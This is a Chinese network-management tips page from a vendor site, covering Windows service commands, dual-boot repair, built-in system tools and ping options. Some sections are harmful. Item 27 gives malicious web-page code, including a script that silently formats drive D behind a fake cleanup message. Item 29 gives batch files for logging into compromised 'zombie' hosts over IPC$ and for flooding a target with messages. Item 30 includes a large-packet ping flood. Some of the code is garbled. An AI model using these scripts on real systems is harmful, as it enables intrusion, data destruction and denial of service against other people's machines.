请选择语言    繁体中文 English 
 
   
网站首页 · 解决方案 · 产品介绍 · 下载中心 · 公司资讯 · 典型客户 · 最新客户 · 购买流程 · 联系我们
 聚生网管产品
 聚生网管系统简介
 聚生网管功能列表
 聚生网管功能截图
 聚生网管技术优势
 聚生网管与众不同
 网络特警产品
 网络特警背景简介
 网络特警核心理念
 网络特警核心优势
 网络特警独特架构
 网络特警功能列表
 网络特警服务体系
 与聚生网管之关系
 与同类产品之对比
 配套产品
 商用安全计算机
 共享文件监视器
 代理服务扫描器
 主机异常警报器
 混杂模式扫描器
 外来电脑隔离器
 远程开关机工具

 聚生网管服务热线
010-82825051
010-82825052
010-82825512
010-62961005
 
 
     新 闻 中 心
网管知识大全6
双击自动滚屏 发布时间:2009-2-25 9:30:37 阅读:1次 【字体:
相关链接:聚生网管禁止迅雷下载、限制QQ游戏、封堵炒股、限制网速国内最强,使用最简单!点击这里了解更多!

25)这里我必须重新重申一个命令!不过说之前我要把这个命令的相关命令稍微介绍一下!
  
   我要说的命令就是:开启服务和停止服务的net
start and net
stop
  
   这两个命令大多数朋友已经很熟悉了吧?不过为了方便更多的菜鸟能看明白我要说的意思,不用再看其他相关文章,所以我简单说两句:net
start是开启服务!那么,如何开启呢?比如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net start
telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!好像是一句废话
  
   OK,有了这个前提后,下面就继续介绍:那么,net
start和net stop到底能开启什么服务?其实这点也不需要你强记,记住这个命令就可以了:net help start和net help
stop,这两个会显示出你所能开启的服务有那些~~
  
   这里比如我们查到了这个服务“CLIENT SERVICE FOR
NETWARE”,那么当这个命令使用net start和net
stop的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!如果服务名称中不带空格,你可以不用带这个引号!!!这点是我强调的问题!大家一定不要忘记了!『前些天看到S8S8.net的黑白新区中有人说net
start 和 net
stop后面的服务名必须带空格是错误的!明白原因了吧?』
  
   26)关于双系统的两个问题:
  
   A、如何在双系统(98、2000)中安全删除2K?
  
   先制作一张Windows
98 的启动软盘,再用它启动你的计算机,运行sys命令恢复Windows 98引导记录后,再运行fdisk/mbr恢复主引导记录,完成后进入Windows
98,把winnt 和system volumn information
目录删除,再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
  
   B、
Windows 98/XP双系统启动菜单修复
  
   1.修复前,在BIOS中设置从光驱启动。用Windows
XP安装盘启动电脑,在加载必要的驱动后,出现Windows XP的安装界面。有三个选项:
  
   (1)要现在开始安装Windows
XP,请按“Enter”键。
  
   (2)要用“恢复控制台”修复Windows
XP安装,按“R”键。
  
   (3)要退出安装程序,不安装Windows XP,按“F3”键;
  
   2.
按“R”键,进入“Microsoft Windows XP (TM)
故障恢复控制台”界面;故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已安装的Windows
XP系统文件,然后显示搜寻结果,并询问“要登录到哪个Windows XP安装(要取消,请按Enter)”,选择1.
D:\Windows,回车,系统会再询问“管理员密码”,再键入安装Windows
XP时设置的管理员密码,回车,出现D:\Windows〉,这时需要输入修复命令Fixboot,后面的参数为启动扇区要写入的磁盘盘符,这里填入C:,回车。修复完成,键入Exit退出。重启后就会看到久违的双重启动菜单了。并且,这样修复后基本不产生垃圾文件。
  
   因为这两个问题是非常非常普遍的,所以我就收集到这里了~
27)这里说几个主页恶意代码:『并不是让大家把这些代码加入到自己的主页中!只是希望大家能了解恶意代码,起到更好的防护作用!』
A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!
预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~
B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……
C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
if
(window.top.moveBy){
for (i = 1;i 0;
j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
说明:是windows9x的设备名称解析漏洞!
WINDOWS9x的\con\con设备名称解析漏洞允许用户进行攻击,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy
coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy
coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用\CON\CON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~
D、格式化硬盘:(最恐怖的~~o慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)
scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm";
scr.Doc=""
WSH.rUN(`start/m
format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused
temporary
files.`);
scr.write();
说明:当您浏览了网页,会把startup.hta文件写入启动文件夹,并提示WINDOWS正在删除临时文件!实际上是在格式化你的D盘,代码中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为:Windows
Scripting Host Shell Object。代码中的:WSH全称是:Windows Scripting
Host,是微软的一种基于32位系统平台与语言无关的教本解释机制,它使得脚本能在WINDOWS桌面或命令提示符下运行~WSH所对应的程序WScript.exe是一个脚本语言解释器,位于WINDOWS所在文件夹下,所以它可以像执行批处理文件一样执行WSH脚本程序~
解决方法:1)更新您的浏览器,使用最新的浏览器上网!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用启动菜单。
3)吧format.com改名
4)禁用WSH。具体方法:在win98中,从添加删除程序中点击WINDOWS安装程序,打开附件一项,将WINDOWS
SCRIPTING HOST前面的选项去掉,就可以卸载掉WSH了~~~win2000和xp的用户可以在我的电脑-工具菜单-文件夹选项-选择文件类型,找到VBS
VBSCRIPT
FILE选项,点击删除!
28)系统自带的系统工具
其实无论大家从什么地方,什么方法找到一些好用的工具,都不如Windows自带的工具用着方便(假设你区的地方正好不能上网,而你又没有准备好这些工具,那怎么办?呵呵,不用着急,用好下面几个Windows自带的小工具,可以使你事半功倍!)
1、msinfo32.exe
位于C:\Program
Files\Common Files
Microsoft
Shared\Msinfo\msinfo32.exe,显示计算机中的有关系统信息,可用其诊断、解决计算机问题并查看远程系统所生成的系统报告。
2、drwatson.exe
--这个工具给我特别的亲密感觉:第一次使用这个工具是在看了LK007大哥给cool兄弟的回复以后,我马上试验~果然很有意思!LK007不愧是大哥!现在想起来都佩服不已~~~
位于C:
\Windows
\drwatson.exe,当某个应用程序在运行过程中出错时,它就会将出错的程序以及出错的内存地址一一记录下来,并保存为Windows的Drwatson子目录下的*.wlg记录文件。
3、sfc.exe
位于C:\Windows\System\sfc.exe,用于自动搜索被改变、删除或损坏了的系统文件。
4、msconfig.exe
位于C:\Windows\System\msconfig.exe,通过修改启动方式以及启动时运行哪些应用程序等系统配置,从而达到快速排除故障的目的。
5、scanreg.exe
位于C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本),用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件,防止因注册表数据被破坏而导致的系统故障。
6、vcmui.exe
位于C:\Windows\vcmui.exe,在后台自动将被覆盖的驱动程序备份下来,当我们安装的新驱动出错时可用它进行恢复。
7、winrep.exe
位于C:\Windows\winrep.exe,能自动收集有关系统信息并提示用户输入故障所在,帮我们编写一篇完整的“求援”报告,并将其发送给有关技术维护人员,简化“求援”操作。
这七个Windows自带的小程序可以在开始菜单--运行中直接输入文件名(无需输入扩展名)调出该程序!
29)批处理在入侵中的几则妙用!
A、简化IPC$登陆肉鸡的操作:
用记事本建立一个名字为:ipcruqin.bat的批处理文件,内容如下:
@net
use \\%1\ipc$ %3 /u:"%2"
@echo OK!已经成功建立连接
之后,大家在CMD下输入:ipcruqin.bat
肉鸡IP
肉鸡的admin帐号/用户的密码。就可以登陆上去了,而不需要那一大长串的命令了!
B、批处理轰炸对方电脑:
打开一记事本,在里面输入如下内容:
@echo
正在轰炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto
start
ver
@echo 发送失败
将其保存为bat格式的文件即可,使用方法:*.bat(该批处理文件的名字)+ 空格 +
目标IP + 空格 +
你要对他说得话!
这次先简单介绍这三个!等下次有机会再给大家介绍更多的批处理文件的用途!
30)再说几个非常简单实用的DOS命令(工具):
A、fport.exe
--查看那些端口都是那些程序使用的命令。
B、netstat -an --查看那些端口于外部的IP连接。比如这里显示 :23
XX.XX.XX.XX 而你又没有开23端口,那么,呵呵……还用我说么?
C、letmain.exe \\ip -admin -d
--列出本机的administrators组的用户名查看是否有异常。
D、pslist.exe
--列o进程
E、pskill.exe
--杀掉进程,有时候再任务管理器中无法终止程序,那就用这个工具来停止进程。
F、login.exe
--列出当前有那些用户登陆再你的机器上。
ping命令详解
ping [-t] [-a] [-n count] [-l
length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k
computer-list]] [-w timeout] destination-list
Options:
-t Ping the
specified host until stopped.To see statistics and continue - type
Control-Break;To stop - type Control-C.
不停的ping地方主机,直到你按下Control-C。
此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。
-a Resolve addresses to hostnames.
解析计算机NetBios名。
示例:C:\>ping -a 192.168.1.21
Pinging
iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from
192.168.1.21: bytes=32 timeping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of
data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from
202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32
time=50ms TTL=241
Request timed out.
………………
Reply from
202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32
time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50,
Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500
bytes of data:
Reply from 192.168.1.21: bytes=65500 timeping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)
Pinging
202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101:
bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214
->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent
= 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in
milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 ,
61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
-s
count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。
-j host-list Loose
source route along host-list.
利用 computer-list
指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。
-k host-list
Strict source route along host-list.
利用 computer-list
指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。
-w timeout Timeout
in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数没有什么其他技巧。
ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
  128---80
  64----40
 
32----20
好了,ping命令也基本上完全讲解完了.谢谢各位支持

总之,网络管理知识,网络管理经验,网络管理手段,网络管理案例,网络控制技术,网络管理技术,网络管理思路,网络管理方案,网络管理教训,网络管理出路,网络管理趋势,网络管理前沿,网络管理工具,网络管理系统首选聚生网管上网管理软件,可以有效禁止局域网迅雷下载,禁止局域网聊天,禁止局域网炒股,限制局域网玩游戏,过滤局域网网站访问等。

聚生网管限制局域网电脑上网软件功能介绍:http://www.grabsun.com/ProductShow104.htm

即可下载聚生网管试用:http://www.grabsun.com/download/grabsun.rar


 

相关链接:聚生网管专业禁止BT下载、限制QQ、封堵大智慧,屏蔽QQ游戏,防ARP欺骗!点击这里查看详情!
打印本页 || 关闭窗口

版权所有 2005-2008 聚生网管公司 版权所有,盗版必究
京ICP备05068297号